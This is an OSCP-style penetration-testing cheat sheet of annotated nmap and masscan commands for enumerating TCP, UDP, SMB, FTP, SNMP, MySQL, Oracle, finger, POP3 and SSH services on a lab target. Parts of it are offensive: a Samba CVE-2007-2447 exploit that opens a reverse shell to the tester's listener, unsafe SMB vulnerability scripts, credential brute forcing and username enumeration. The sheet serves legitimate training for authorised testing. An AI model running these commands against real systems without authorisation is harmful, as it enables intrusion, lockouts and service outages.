OSCP
Port & Services Scanning

For TCP Scan - Nmap

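# Target comes from $IP (export IP=10.10.10.10). SYN scans (-sS), OS detection and -A
# need root; use -sT (full connect) when you are not root.
: "${IP:?set IP to the target host first}"

# Quick look: SYN scan of the top 1000 ports with -A (versions, OS, default scripts,
# traceroute). -Pn skips host discovery, so a host that drops ICMP is still scanned.
nmap -Pn -v -sS -A -T4 "$IP"

# Full TCP range tuned for speed. --max-retries 1 and --defeat-rst-ratelimit trade accuracy
# for time: one dropped probe is one missed port, so confirm gaps with a slower pass.
# --max-scan-delay reads a bare number as seconds; 20ms is the intended cap (-T4 alone
# sets 10ms). -oA needs the output directory to exist already.
nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20ms --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/Documents/XXXX "$IP"

# Default scripts + version detection on the top 1000 ports; all three output formats
# land in quick.{nmap,gnmap,xml}.
nmap -sC -sV -vv -oA quick "$IP"

# Same, but every port. Slow, because -sC/-sV run against each open port found.
nmap -sV -sC -T4 -p- -oA nmap "$IP"

# Single-port version probe; --reason prints why nmap believes the state (e.g. syn-ack).
nmap -sS -p4555 -sV --reason "$IP"

# Top 100 ports with banner grabbing; the 00-tcp-top100/ directory must exist first.
nmap -sS -T4 -sV -oA 00-tcp-top100/top-100 --stats-every 60s --max-retries 3 --defeat-rst-ratelimit --top-ports 100 --script banner --reason "$IP"

# Fastest full-range sweeps: --min-rate forces at least N packets/s. Lossy on a congested
# VPN, so use them to find candidates and rescan the hits with -sC -sV.
nmap -sS --min-rate 5000 --max-retries 1 -p- "$IP"
nmap -sT -p- --min-rate 10000 -oA nmap/alltcp "$IP"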

MassScan

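# Target in $IP. masscan needs root and sends raw packets out of one interface: -e tun0
# pins the VPN (masscan ignores the kernel routing table). --rate is packets/s; keep it
# low on lab VPNs or open ports silently go missing.
masscan -p1-65535 "$IP" --rate=1000 -e tun0 > ports

# Turn "Discovered open port 22/tcp on 10.10.10.10" lines into "22,80,443". Matching on
# the message text ignores anything else masscan may print to stdout.
ports=$(awk '/Discovered open port/ { split($4, f, "/"); print f[1] }' ports | sort -nu | paste -sd, -)

# Scripts + versions on just those ports. ${ports:?} aborts this command (not your shell)
# instead of running nmap with an empty -p. -Pn: masscan already proved the host is up.
nmap -Pn -sV -sC -p"${ports:?no open ports found in ./ports}" "$IP"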

Full TCP Scan

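# Target in $IP. Two ways to cover all 65535 TCP ports.

# One pass: default scripts + versions on every port. Thorough but slow.
nmap -sC -sV -p- -vv -oA full "$IP"

# Two passes: a fast connect sweep (no root needed) finds the open ports...
nmap -sT -p- --min-rate 10000 -oA nmap/alltcp "$IP"

# ...then scripts/versions run only on those, read back from the greppable output
# ("22/open/tcp//ssh///" entries). The nmap/ directory must exist for -oA.
open_ports=$(grep -oE '[0-9]+/open' nmap/alltcp.gnmap | cut -d/ -f1 | sort -nu | paste -sd, -)
nmap -sC -sV -p"${open_ports:?no open ports in nmap/alltcp.gnmap}" -oA nmap/alltcp-services "$IP"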

For UDP Scan

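# Target in $IP. UDP scans need root, and UDP is slow by nature: an unanswered probe is
# reported "open|filtered", and many hosts rate-limit ICMP port-unreachable replies, so nmap
# throttles itself. Full-range UDP with -sV can run for hours; treat it as a background job.
nmap -sU -sV -p- "$IP"

# Realistic default: top 1000 UDP ports, one retry, progress every 3 minutes. Output
# directory must exist for -oA.
nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oA /root/Documents/XXXX "$IP"

# Version probes on nmap's default UDP port list; results in quick_udp.{nmap,gnmap,xml}.
nmap -sU -sV -vv -oA quick_udp "$IP"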

Port Knocking

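# Port knocking: hit the ports in order, one SYN each. --max-retries 0 is what makes the
# loop fast (a single probe per port, no waiting for retransmits); the host timeout is only
# a safety net. Recent nmap reads a bare number as seconds and rejects very small values,
# so do not "fix" 201 into milliseconds. Target in $IP; set the sequence the knock daemon expects.
for knock in 7000 8000 9000; do
  nmap -Pn --host-timeout 201 --max-retries 0 -p "$knock" "$IP"
done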

SMB Scan Scripts (Ports 139, 445)

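# Target in $IP. SMB enumeration and vulnerability checks (139/tcp, 445/tcp).

# Which SMB dialects the server accepts. SMBv1 enabled = old box, worth the checks below.
nmap -p445 --script smb-protocols "$IP"

# EternalBlue (MS17-010) check only.
nmap -p445 --script smb-vuln-ms17-010 "$IP"

# Every smb-vuln-* script. The pattern is quoted so the shell never glob-expands it against
# files in the current directory. unsafe=1 enables checks that can crash the service (DoS) —
# use it only where taking the target down is acceptable.
nmap "$IP" -sV -Pn -vv -p 139,445 --script='smb-vuln*' --script-args=unsafe=1

# MSRPC endpoint listing over SMB.
nmap "$IP" --script=msrpc-enum

# smb-vuln-* again without the unsafe checks, saved to nmap/smb_vulns.* (directory must exist).
nmap --script 'smb-vuln*' -p 445 -oA nmap/smb_vulns "$IP"

# The whole "vuln" category against 445: broad and noisy, slower than the targeted lines above.
nmap --script vuln -p445 "$IP"

# Samba "username map script" command injection (CVE-2007-2447, Samba 3.0.0-3.0.25rc3).
# Per the tool's usage the arguments are <target> <target port> <your IP> <your port> —
# verify against its README. The payload connects back, so start a listener first
# (nc -lvnp 1234). Try 445, then 139.
python usermap_script.py "$IP" 445 "$LHOST" 1234
python usermap_script.py "$IP" 139 "$LHOST" 1234
# https://github.com/amriunix/CVE-2007-2447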

FTP Port 21 Scan Scripts

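# Target in $IP. FTP (21/tcp): anonymous login, FTP bounce, known backdoors
# (ftp-proftpd-backdoor, ftp-vsftpd-backdoor) and the libopie / CVE-2010-4221 checks.
# Note the option is --script with two ASCII hyphens; the original had an en dash, which
# nmap would silently treat as a hostname to scan.
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -p 21 "$IP"

# tftp-enum is a UDP/69 script and never fires on 21/tcp, so it gets its own (root) scan.
nmap -sU -p 69 --script tftp-enum "$IP"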

SNMP Port 161 (plus Kerberos Port 88)

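# Target in $IP. SNMP is UDP (161 agent, 162 traps); -sU needs root. The snmp-* scripts
# authenticate with the community string, "public" unless --script-args snmpcommunity=... is given.
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes "$IP"

# Windows local users via SNMP. Scripts in nmap's script directory need no /usr/share path.
nmap -sU -p 161 --script snmp-win32-users "$IP"

# Not SNMP: Kerberos user enumeration on 88/tcp (Active Directory), kept with this section
# as in the original. Set the realm to the AD domain name. The wordlist path is a SecLists
# install; on Kali it is /usr/share/seclists/Usernames/... — adjust to yours.
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt "$IP"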

MYSQL PORT 3306

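# Target in $IP. Many MySQL scripts in one line. Only mysql-info, mysql-empty-password,
# mysql-enum and mysql-vuln-cve2012-2122 (auth bypass) work unauthenticated. mysql-databases,
# mysql-users, mysql-variables, mysql-dump-hashes, mysql-query and mysql-audit need credentials
# (--script-args mysqluser=...,mysqlpass=...), mysql-query also needs mysql-query.query and
# mysql-audit needs mysql-audit.filename; without those they just report nothing.
nmap -sV -Pn -vv "$IP" -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122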

Oracle Port 1521/1560

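# Target in $IP. Oracle TNS listener, default 1521/tcp.

# Guess the SID (instance name) first — every later step needs it.
nmap --script=oracle-sid-brute "$IP"

# Credential brute force; requires the SID found above. Failed logins count against the
# account lockout policy, so check that locking users out is acceptable before running it.
nmap --script=oracle-brute --script-args oracle-brute.sid="$SID" "$IP"

# Listener version/status via tnscmd10g; older listeners answer these without authentication.
tnscmd10g version -h "$IP"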

Finger Port 79

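# Target in $IP. finger (79/tcp) confirms which usernames exist on the host.

# Bare invocation prints the usage text.
finger-user-enum

# Username guessing from a wordlist; -t takes the target (it was missing in the original).
# The list path is the SecLists layout on Kali — adjust to your install.
finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t "$IP"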

POP3 Port 110

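# Target in $IP. POP3 (110/tcp) is plaintext: the password crosses the wire in the clear,
# so only do this over the lab VPN. The original "telnet ip" without a port would have
# connected to 23, not 110. For POP3S (995) use: openssl s_client -connect "$IP":995
telnet "$IP" 110

# Then type, one command per line (the server answers +OK or -ERR):
#   USER <username>
#   PASS <password>
#   LIST              # message numbers and sizes — this is the "list messages" command
#   RETR <n>          # print message n in full
#   QUIT
#
# Example session against a known account:
#   USER user
#   PASS pw
#   LIST
#   RETR 2
#   QUIT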
SSH PORT 22
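# Target in $IP. Lists the key-exchange, host-key, cipher and MAC algorithms the server
# offers; -n skips reverse DNS. Weak entries (arcfour, CBC ciphers, SHA-1 MACs,
# diffie-hellman-group1) are findings, and the banner that -sV prints gives the exact
# SSH version to check against known CVEs.
nmap -p22 -n -sV --script ssh2-enum-algos "$IP"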